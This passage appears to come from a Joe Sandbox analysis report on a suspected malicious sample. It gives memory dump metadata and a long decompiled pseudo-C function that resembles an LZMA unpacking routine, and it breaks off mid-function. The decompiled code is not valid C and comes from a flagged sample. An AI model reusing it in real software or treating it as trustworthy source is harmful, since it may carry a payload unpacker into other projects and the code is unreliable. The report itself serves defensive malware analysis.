                                                                        0x004074c7
                                                                        0x00407490

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                        • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                        • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                        • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00407395() {
                                                                        				void _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int* _t605;
                                                                        				void* _t612;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t612 - 0x40) != 0) {
                                                                        						 *(_t612 - 0x84) = 0x13;
                                                                        						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                        						goto L132;
                                                                        					} else {
                                                                        						__eax =  *(__ebp - 0x4c);
                                                                        						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        						__ecx =  *(__ebp - 0x58);
                                                                        						__eax =  *(__ebp - 0x4c) << 4;
                                                                        						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        						L130:
                                                                        						 *(__ebp - 0x58) = __eax;
                                                                        						 *(__ebp - 0x40) = 3;
                                                                        						L144:
                                                                        						 *(__ebp - 0x7c) = 0x14;
                                                                        						L145:
                                                                        						__eax =  *(__ebp - 0x40);
                                                                        						 *(__ebp - 0x50) = 1;
                                                                        						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                        						L149:
                                                                        						if( *(__ebp - 0x48) <= 0) {
                                                                        							__ecx =  *(__ebp - 0x40);
                                                                        							__ebx =  *(__ebp - 0x50);
                                                                        							0 = 1;
                                                                        							__eax = 1 << __cl;
                                                                        							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                        							__eax =  *(__ebp - 0x7c);
                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                        							while(1) {
                                                                        								L140:
                                                                        								 *(_t612 - 0x88) = _t533;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t534 =  *(_t612 - 0x88);
                                                                        									if(_t534 > 0x1c) {
                                                                        										break;
                                                                        									}
                                                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                        										case 0:
                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                        											_t534 =  *( *(_t612 - 0x70));
                                                                        											if(_t534 > 0xe1) {
                                                                        												goto L171;
                                                                        											}
                                                                        											_t538 = _t534 & 0x000000ff;
                                                                        											_push(0x2d);
                                                                        											asm("cdq");
                                                                        											_pop(_t569);
                                                                        											_push(9);
                                                                        											_pop(_t570);
                                                                        											_t608 = _t538 / _t569;
                                                                        											_t540 = _t538 % _t569 & 0x000000ff;
                                                                        											asm("cdq");
                                                                        											_t603 = _t540 % _t570 & 0x000000ff;
                                                                        											 *(_t612 - 0x3c) = _t603;
                                                                        											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                        											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                        											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                        											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                        												L10:
                                                                        												if(_t611 == 0) {
                                                                        													L12:
                                                                        													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                        													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                        													goto L15;
                                                                        												} else {
                                                                        													goto L11;
                                                                        												}
                                                                        												do {
                                                                        													L11:
                                                                        													_t611 = _t611 - 1;
                                                                        													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                        												} while (_t611 != 0);
                                                                        												goto L12;
                                                                        											}
                                                                        											if( *(_t612 - 4) != 0) {
                                                                        												GlobalFree( *(_t612 - 4));
                                                                        											}
                                                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                        											 *(_t612 - 4) = _t534;
                                                                        											if(_t534 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                        												goto L10;
                                                                        											}
                                                                        										case 1:
                                                                        											L13:
                                                                        											__eflags =  *(_t612 - 0x6c);
                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                        												 *(_t612 - 0x88) = 1;
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                        											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                        											_t45 = _t612 - 0x48;
                                                                        											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                        											__eflags =  *_t45;
                                                                        											L15:
                                                                        											if( *(_t612 - 0x48) < 4) {
                                                                        												goto L13;
                                                                        											}
                                                                        											_t546 =  *(_t612 - 0x40);
                                                                        											if(_t546 ==  *(_t612 - 0x74)) {
                                                                        												L20:
                                                                        												 *(_t612 - 0x48) = 5;
                                                                        												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                        												goto L23;
                                                                        											}
                                                                        											 *(_t612 - 0x74) = _t546;
                                                                        											if( *(_t612 - 8) != 0) {
                                                                        												GlobalFree( *(_t612 - 8));
                                                                        											}
                                                                        											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                        											 *(_t612 - 8) = _t534;
                                                                        											if(_t534 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												goto L20;
                                                                        											}
                                                                        										case 2:
                                                                        											L24:
                                                                        											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                        											 *(_t612 - 0x84) = 6;
                                                                        											 *(_t612 - 0x4c) = _t553;
                                                                        											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                        											goto L132;
                                                                        										case 3:
                                                                        											L21:
                                                                        											__eflags =  *(_t612 - 0x6c);
                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                        												 *(_t612 - 0x88) = 3;
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                        											_t67 = _t612 - 0x70;
                                                                        											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                        											__eflags =  *_t67;
                                                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                        											L23:
                                                                        											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                        											if( *(_t612 - 0x48) != 0) {
                                                                        												goto L21;
                                                                        											}
                                                                        											goto L24;
                                                                        										case 4:
                                                                        											L133:
                                                                        											_t531 =  *_t605;
                                                                        											_t588 = _t531 & 0x0000ffff;
                                                                        											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                        											if( *(_t612 - 0xc) >= _t564) {
                                                                        												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                        												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                        												 *(_t612 - 0x40) = 1;
                                                                        												_t532 = _t531 - (_t531 >> 5);
                                                                        												__eflags = _t532;
                                                                        												 *_t605 = _t532;
                                                                        											} else {
                                                                        												 *(_t612 - 0x10) = _t564;
                                                                        												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                        												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                        											}
                                                                        											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                        												goto L139;
                                                                        											} else {
                                                                        												goto L137;
                                                                        											}
                                                                        										case 5:
                                                                        											L137:
                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                        												 *(_t612 - 0x88) = 5;
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                        											L139:
                                                                        											_t533 =  *(_t612 - 0x84);
                                                                        											goto L140;
                                                                        										case 6:
                                                                        											__edx = 0;
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) = 1;
                                                                        												 *(__ebp - 0x84) = 7;
                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        												goto L132;
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        											__esi =  *(__ebp - 0x60);
                                                                        											__cl = 8;
                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        											__ecx =  *(__ebp - 4);
                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                        													_t98 = __ebp - 0x38;
                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        													__eflags =  *_t98;
                                                                        												} else {
                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        												}
                                                                        											} else {
                                                                        												 *(__ebp - 0x38) = 0;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												goto L61;
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 8);
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        												goto L41;
                                                                        											}
                                                                        										case 7:
                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        												 *(__ebp - 0x80) = 0x16;
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x28);
                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        												__al = __al & 0x000000fd;
                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                        												__eflags = __eax;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												goto L69;
                                                                        											}
                                                                        											__eax =  *(__ebp - 4);
                                                                        											__ecx =  *(__ebp - 0x38);
                                                                        											 *(__ebp - 0x84) = 8;
                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        											goto L132;
                                                                        										case 8:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 0xa;
                                                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x38);
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                                                        												 *(__ebp - 0x84) = 9;
                                                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        											}
                                                                        											goto L132;
                                                                        										case 9:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												goto L90;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x60);
                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                        												goto L171;
                                                                        											}
                                                                        											__eax = 0;
                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        											__eflags = _t259;
                                                                        											0 | _t259 = _t259 + _t259 + 9;
                                                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                        											goto L76;
                                                                        										case 0xa:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        												goto L132;
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x28);
                                                                        											goto L89;
                                                                        										case 0xb:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__ecx =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x20);
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x28);
                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        											L89:
                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        											L90:
                                                                        											__eax =  *(__ebp - 4);
                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        											goto L69;
                                                                        										case 0xc:
                                                                        											L100:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t335 = __ebp - 0x70;
                                                                        											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t335;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											__eax =  *(__ebp - 0x2c);
                                                                        											goto L102;
                                                                        										case 0xd:
                                                                        											L37:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t122 = __ebp - 0x70;
                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t122;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L39:
                                                                        											__eax =  *(__ebp - 0x40);
                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        												goto L48;
                                                                        											}
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												goto L54;
                                                                        											}
                                                                        											L41:
                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        											 *(__ebp - 0x48) = __eax;
                                                                        											__eax = __eax + 1;
                                                                        											__eax = __eax << 8;
                                                                        											__eax = __eax + __ebx;
                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edx = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												 *(__ebp - 0x40) = 1;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												__ebx = __ebx + __ebx + 1;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edx;
                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L39;
                                                                        											} else {
                                                                        												goto L37;
                                                                        											}
                                                                        										case 0xe:
                                                                        											L46:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t156 = __ebp - 0x70;
                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t156;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											while(1) {
                                                                        												L48:
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													break;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__edx = __ebx + __ebx;
                                                                        												__ecx =  *(__ebp - 0x10);
                                                                        												__esi = __edx + __eax;
                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													_t170 = __edx + 1; // 0x1
                                                                        													__ebx = _t170;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L46;
                                                                        												}
                                                                        											}
                                                                        											L54:
                                                                        											_t173 = __ebp - 0x34;
                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        											__eflags =  *_t173;
                                                                        											goto L55;
                                                                        										case 0xf:
                                                                        											L58:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t203 = __ebp - 0x70;
                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t203;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L60:
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												L55:
                                                                        												__al =  *(__ebp - 0x44);
                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        												goto L56;
                                                                        											}
                                                                        											L61:
                                                                        											__eax =  *(__ebp - 0x58);
                                                                        											__edx = __ebx + __ebx;
                                                                        											__ecx =  *(__ebp - 0x10);
                                                                        											__esi = __edx + __eax;
                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edi = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												_t217 = __edx + 1; // 0x1
                                                                        												__ebx = _t217;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edi;
                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L60;
                                                                        											} else {
                                                                        												goto L58;
                                                                        											}
                                                                        										case 0x10:
                                                                        											L110:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t366 = __ebp - 0x70;
                                                                        											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t366;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											goto L112;
                                                                        										case 0x11:
                                                                        											L69:
                                                                        											__esi =  *(__ebp - 0x58);
                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                        											L132:
                                                                        											 *(_t612 - 0x54) = _t605;
                                                                        											goto L133;
                                                                        										case 0x12:
                                                                        											goto L0;
                                                                        										case 0x13:
                                                                        											__eflags =  *(__ebp - 0x40);
